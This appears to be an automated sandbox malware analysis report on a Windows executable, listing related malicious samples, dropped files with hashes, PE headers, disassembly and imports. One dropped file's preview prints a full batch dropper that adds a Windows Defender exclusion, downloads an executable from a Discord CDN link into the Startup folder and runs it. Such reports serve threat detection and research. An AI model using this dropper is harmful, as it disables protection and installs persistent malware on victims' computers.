                                                                                                                                                                                                        74954a0c86284d0d6e1c4efefe92b521https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        #U2749VER CUENTA#U2749_#U2464#U2466#U2460#U2462#U2463#U2460#U2466#U2462.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        6725c86d7fc7b.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        26HY8aPgae.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        26HY8aPgae.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        upb.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        6724f91d7b548.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        #U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                        Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                                                                                                                                                                        MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                                                                                                                                                                        SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                                                                                                                                                                        SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                                                                                                                                                                        SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:@...e................................................@..........
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\decrypted_executable.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):520
                                                                                                                                                                                                        Entropy (8bit):5.474210769377814
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:NE8ouxroxd9Qq7H8JPqaWOW0uVM1t2KoV3CRpjgQhQaU9c1H:cuJoxd9Qq7H3bOW0uVMyCRNxi98H
                                                                                                                                                                                                        MD5:3B09CDE57CAB3D2911A3A3BAFE5C15F6
                                                                                                                                                                                                        SHA1:F41FF9151D35DB47938EA678CCB28EE7E538401B
                                                                                                                                                                                                        SHA-256:52BF27517F2D6FB4B5E872D0B7D87FA5327226560962C14C29BDD7D02FC74265
                                                                                                                                                                                                        SHA-512:510D3076D10682123BB90F4D7837B97A971C6896F0FF6433D9823B702EE0C75A912368E916ABFECF8A92BE1B458325B27E40DA5F5D0CE42E31A77133F0A8F307
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Preview:@shift /0..powershell -w hidden -c Add-MpPreference -ExclusionPath ""....@echo off..setlocal....set "URL=https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"..set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe"....if exist "%DEST%" del "%DEST%"....curl --silent --output "%DEST%" "%URL%"....if %errorlevel% neq 0 (..exit /b %errorlevel%..)....call "%DEST%"
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):55296
                                                                                                                                                                                                        Entropy (8bit):7.909719369485189
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:C4dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNQ6Vc:C4dzVTaer344JzthRZijQ1JQ
                                                                                                                                                                                                        MD5:488192B42924057D251CC3D5212DC451
                                                                                                                                                                                                        SHA1:F0D20D9BC729BA74CB980E44789BF0E919F760FE
                                                                                                                                                                                                        SHA-256:7E92078811FD6BC34F2367CEE3BFB122EAFFDD995F6FD479FFAE6D3AEA50CB86
                                                                                                                                                                                                        SHA-512:1B4DC240C440C324FB0A7598E4C725F2B92BAD0999FBD4EBFFD8EEC78E31E5887396E2721464BCECAFA1C00703269EDB24F6B94FBC4879373F4847840331E315
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 36%, Browse
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E.@]........../....2.........p...@.........@.............................`...............................................................T.......P..............................................................................................................UPX0.....p..............................UPX1................................@....rsrc........P......................@...3.94.UPX!.$......Y.m..*..........I......$ ..].f9.........d.HTS....1.q.....u.. `,Eq. Pf.,.7..?C.-5y.Uy....&....".x9...J...J<.Z..7...EV...\..Y.1.>.A....,Z.{.....lQ.,Go4..$3.f.N...j../O..,7.Fu....3K......,.....r..E................S.......A^QJB...s.G.$7.X.<...........r....$.f...&5.v.7...fp..<.L.{..MI?ql..y.6..whG...=e.Oh.F.JU...........1..Zjo.....*..[.|......b.f....7.5....+.E........{.....3L)f..._.A. .S.3>.....!R. ....Z....Bl....r&....Z..su...LEI.J.<..*mu.....
                                                                                                                                                                                                        Process:C:\Windows\System32\curl.exe
                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):86458059
                                                                                                                                                                                                        Entropy (8bit):5.888199174585409
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:393216:d76L6otUitqtH7wHtXq2pt2jbOCacCFIK0fpP9HF4VW8yfJnVQx4urYsANulL7Np:d0LoCOn+2Js4urYDNulLBiu9
                                                                                                                                                                                                        MD5:419576A88D2EB1B14DF6EC22F7579C67
                                                                                                                                                                                                        SHA1:C27CFF43A8FD6E9C9ECC9AF46EBA18A128933C6C
                                                                                                                                                                                                        SHA-256:94C7342783E2A40AA1AAB1D59314CA83EF8924E4695A3CF3B001A2D25D82C8E0
                                                                                                                                                                                                        SHA-512:B5DF50EC54D7E8B8081A4972E8B61D8B1D4D02B036054BC255C5D6F40601470200165A64E53674563936FF9CC01999E21A629AD624E0055E6C8AB2BF44879B68
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......v.@.2...2...2....-.*....+......*.....`.*.!...`.-.8...`.+.S...T...>...2...,....-.0....+.P....*.c..../.%...2./.....'.6......3......3...2..3....,.3...Rich2...........PE..d...B..b.........."......~....-................@..............................=...........`...............................................!...........9.x*....,...............;.$... ...p.......................(.......8...............(............................text...@|.......~.................. ..`.rdata.............................@..@.data...,.-.. ......................@....pdata........,.....................@..@_RDATA........9.....................@..@.rsrc...x*....9..,..................@..@.reloc..$.....;.....................@..B........................................................................................................................................................
                                                                                                                                                                                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):6.677536966163331
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                                        File size:34'965'741 bytes
                                                                                                                                                                                                        MD5:8fb77810c61e160a657298815346996e
                                                                                                                                                                                                        SHA1:4268420571bb1a858bc6a9744c0742d6fd738a83
                                                                                                                                                                                                        SHA256:a0840c581f8f1d606fdc43bc98bd386755433bf1fb36647ecf2165eea433ff66
                                                                                                                                                                                                        SHA512:b0d0aea14bfbb5dfa17536b1669d85fc1325140f6a0176ae1c04870efa3adc902d5755f0df00d305f01120960e95bfc40c37c7519ec2827797ebaa95097cfeb2
                                                                                                                                                                                                        SSDEEP:393216:d76L6otUitqtH7wHtXq2pt2jbOCacCFIK0fpP9HF4VW8yfGnVQx4urYsANulL7Nv:d0LoCOn+2Gs4urYDNulLBiub
                                                                                                                                                                                                        TLSH:CC776B0772E60195E8B7D2388AA75103D773B8634731CADF316D06152FBBAD0AA7B721
                                                                                                                                                                                                        File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......v.@.2...2...2.....-.*.....+.......*.....`.*.!...`.-.8...`.+.S...T...>...2...,.....-.0.....+.P.....*.c...../.%...2./.......'.6..
                                                                                                                                                                                                        Icon Hash:0f3bfcfc7979130e
                                                                                                                                                                                                        Entrypoint:0x1410ac2f8
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x62C8BD42 [Fri Jul 8 23:26:58 2022 UTC]
                                                                                                                                                                                                        TLS Callbacks:0x410ac004, 0x1
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:66b10d8b5718b0fd6fb4865843d44280
                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                        call 00007F22D4851070h
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                        jmp 00007F22D4850AC7h
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov eax, esp
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov dword ptr [eax+08h], ebx
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov dword ptr [eax+10h], ebp
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov dword ptr [eax+18h], esi
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov dword ptr [eax+20h], edi
                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                                                        dec ecx
                                                                                                                                                                                                        mov ebx, dword ptr [ecx+38h]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov esi, edx
                                                                                                                                                                                                        dec ebp
                                                                                                                                                                                                        mov esi, eax
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov ebp, ecx
                                                                                                                                                                                                        dec ecx
                                                                                                                                                                                                        mov edx, ecx
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov ecx, esi
                                                                                                                                                                                                        dec ecx
                                                                                                                                                                                                        mov edi, ecx
                                                                                                                                                                                                        dec esp
                                                                                                                                                                                                        lea eax, dword ptr [ebx+04h]
                                                                                                                                                                                                        call 00007F22D4850185h
                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                        and al, 66h
                                                                                                                                                                                                        neg al
                                                                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                                                                        inc ebp
                                                                                                                                                                                                        sbb eax, eax
                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                        neg eax
                                                                                                                                                                                                        inc esp
                                                                                                                                                                                                        add eax, eax
                                                                                                                                                                                                        inc esp
                                                                                                                                                                                                        test dword ptr [ebx+04h], eax
                                                                                                                                                                                                        je 00007F22D4850C63h
                                                                                                                                                                                                        dec esp
                                                                                                                                                                                                        mov ecx, edi
                                                                                                                                                                                                        dec ebp
                                                                                                                                                                                                        mov eax, esi
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov edx, esi
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov ecx, ebp
                                                                                                                                                                                                        call 00007F22D4853939h
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov ebx, dword ptr [esp+30h]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov ebp, dword ptr [esp+38h]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov esi, dword ptr [esp+40h]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov edi, dword ptr [esp+48h]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        add esp, 20h
                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        lea ecx, dword ptr [0121CD8Dh]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        jmp dword ptr [0004CE0Eh]
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov eax, esp
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov dword ptr [eax+18h], ebx
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov dword ptr [eax+20h], esi
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov dword ptr [eax+10h], edx
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov dword ptr [eax+08h], ecx
                                                                                                                                                                                                        push edi
                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                        push edi
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        sub esp, 30h
                                                                                                                                                                                                        dec ebp
                                                                                                                                                                                                        mov edi, ecx
                                                                                                                                                                                                        dec ebp
                                                                                                                                                                                                        mov esi, eax
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x1dde2c00x2109e4.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1feeca40xf0.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x239a0000x22a78.rsrc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x22cb0000xcd8a8.pdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x23bd0000x1c324.reloc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1ce15200x70.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x1ce17000x28.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1ce15900x138.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10f90000xc28.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        .text0x10000x10f7c400x10f7e007ff811e53e91692c74554cb15f627f2eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rdata0x10f90000xef85c40xef86001e3567c1900692e31f0e504a9e88a196unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .data0x1ff20000x2d892c0x2da00d2d86d1a7fd7661de7074d191730e9beunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .pdata0x22cb0000xcd8a80xcda007c7dd899fc914d0919cf1eb2bef4e7fbFalse0.47860942249240124data6.780767036445384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        _RDATA0x23990000xf40x20027931c106c58fbe03bb12872283529b7False0.3046875data2.875091738089016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rsrc0x239a0000x22a780x22c006bb4493027c58eeed89b1869f5855775False0.43742271807553956data6.164724090954661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .reloc0x23bd0000x1c3240x1c40081be29a4ac9aa11476a8fae36ba3ee7aFalse0.17890106471238937data5.488361285409069IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                        RT_ICON0x239a2200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/mEnglishUnited States0.6214539007092199
                                                                                                                                                                                                        RT_ICON0x239a6880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/mEnglishUnited States0.37406191369606
                                                                                                                                                                                                        RT_ICON0x239b7300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishUnited States0.28226141078838174
                                                                                                                                                                                                        RT_ICON0x239dcd80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/mEnglishUnited States0.23358526216343883
                                                                                                                                                                                                        RT_ICON0x23a1f000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/mEnglishUnited States0.1762244173666154
                                                                                                                                                                                                        RT_ICON0x23b27280x9ccaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004235387911704
                                                                                                                                                                                                        RT_GROUP_ICON0x23bc3f80x5adataEnglishUnited States0.7555555555555555
                                                                                                                                                                                                        RT_VERSION0x23bc4580x2e8dataEnglishUnited States0.45698924731182794
                                                                                                                                                                                                        RT_MANIFEST0x23bc7400x336XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (762), with CRLF line terminatorsEnglishUnited States0.5048661800486618
                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                        dbghelp.dllSymSetSearchPathW, SymGetSearchPathW, SymGetModuleBase64, SymFunctionTableAccess64, StackWalk64, SymSetOptions, SymFromAddr, SymInitialize, SymGetLineFromAddr64, SymCleanup, UnDecorateSymbolName
                                                                                                                                                                                                        WS2_32.dllgetnameinfo, freeaddrinfo, getaddrinfo, WSACleanup, WSASetLastError, ntohs, htonl, ntohl, closesocket, getsockopt, WSAStartup, send, gethostname, __WSAFDIsSet, gethostbyname, accept, sendto, recvfrom, WSAIoctl, recv, FreeAddrInfoW, GetAddrInfoW, GetNameInfoW, select, WSASocketW, WSASend, WSAGetOverlappedResult, WSADuplicateSocketW, shutdown, listen, htons, WSASendTo, WSARecvFrom, WSARecv, setsockopt, getsockname, getpeername, ioctlsocket, connect, bind, WSAGetLastError, socket
                                                                                                                                                                                                        IPHLPAPI.DLLConvertInterfaceIndexToLuid, GetAdaptersAddresses, ConvertInterfaceLuidToNameW
                                                                                                                                                                                                        PSAPI.DLLEnumProcessModules, GetProcessMemoryInfo, GetModuleFileNameExW
                                                                                                                                                                                                        USERENV.dllGetUserProfileDirectoryW
                                                                                                                                                                                                        ADVAPI32.dllCryptSetHashParam, GetUserNameW, RegCloseKey, RegEnumKeyExA, RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExW, EventWriteTransfer, EventUnregister, EventRegister, ReportEventW, RegisterEventSourceW, DeregisterEventSource, CryptEnumProvidersW, CryptSignHashW, CryptDestroyHash, CryptCreateHash, CryptDecrypt, CryptExportKey, CryptGetUserKey, CryptGetProvParam, OpenProcessToken, CryptDestroyKey, CryptReleaseContext, CryptAcquireContextW, SetSecurityInfo, GetSecurityInfo, SetEntriesInAclA, FreeSid, AllocateAndInitializeSid, SystemFunction036, RegGetValueW, RegQueryValueExW, RegOpenKeyExW, RegQueryInfoKeyW
                                                                                                                                                                                                        USER32.dllGetProcessWindowStation, MapVirtualKeyW, DispatchMessageA, TranslateMessage, MessageBoxW, GetSystemMetrics, GetMessageA, GetUserObjectInformationW
                                                                                                                                                                                                        CRYPT32.dllCertCloseStore, CertEnumCertificatesInStore, CertFindCertificateInStore, CertDuplicateCertificateContext, CertFreeCertificateContext, CertGetCertificateContextProperty, CertOpenStore
                                                                                                                                                                                                        bcrypt.dllBCryptGenRandom
                                                                                                                                                                                                        KERNEL32.dllRtlCaptureContext, RtlLookupFunctionEntry, WaitForSingleObjectEx, GetCPInfo, GetStringTypeW, InitializeSListHead, IsProcessorFeaturePresent, UnhandledExceptionFilter, InterlockedPushEntrySList, RtlUnwindEx, RtlPcToFileHeader, RaiseException, ExitProcess, SetStdHandle, CreateThread, ExitThread, FreeLibraryAndExitThread, GetFileAttributesExW, SetFileAttributesW, GetConsoleOutputCP, GetDriveTypeW, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, CompareStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapReAlloc, SetEndOfFile, OutputDebugStringW, HeapSize, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetProcessHeap, CreateEventW, InitializeConditionVariable, VerSetConditionMask, VerifyVersionInfoW, GetEnvironmentVariableA, WideCharToMultiByte, GetLastError, GetLocalTime, SetConsoleCtrlHandler, CloseHandle, WaitForSingleObject, CreateRemoteThread, OpenProcess, OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, GetFileType, RemoveVectoredExceptionHandler, RtlCaptureStackBackTrace, GetStdHandle, GetCurrentProcess, GetCurrentProcessId, VirtualQuery, MultiByteToWideChar, WriteConsoleW, LocalFree, FormatMessageA, InitOnceExecuteOnce, CreateEventA, GetModuleHandleA, GetProcAddress, LoadLibraryA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentVariableW, SetEnvironmentVariableW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetTempPathW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, GetProcessTimes, SetPriorityClass, GetPriorityClass, GlobalMemoryStatusEx, GetSystemInfo, GetSystemTimeAsFileTime, GetVersionExW, GetModuleFileNameW, GetProcessIoCounters, VerifyVersionInfoA, FileTimeToSystemTime, GetConsoleTitleW, SetConsoleTitleW, CreateToolhelp32Snapshot, Process32First, Process32Next, SetHandleInformation, CreateIoCompletionPort, SetFileCompletionNotificationModes, CreateFileA, CreateFileW, DuplicateHandle, PostQueuedCompletionStatus, SetEvent, ResetEvent, QueueUserWorkItem, RegisterWaitForSingleObject, UnregisterWait, GetConsoleMode, SetConsoleMode, GetNumberOfConsoleInputEvents, ReadConsoleInputW, ReadConsoleW, FillConsoleOutputCharacterW, FillConsoleOutputAttribute, GetConsoleCursorInfo, SetConsoleCursorInfo, GetConsoleScreenBufferInfo, SetConsoleCursorPosition, SetConsoleTextAttribute, WriteConsoleInputW, CancelIoEx, CancelIo, SwitchToThread, 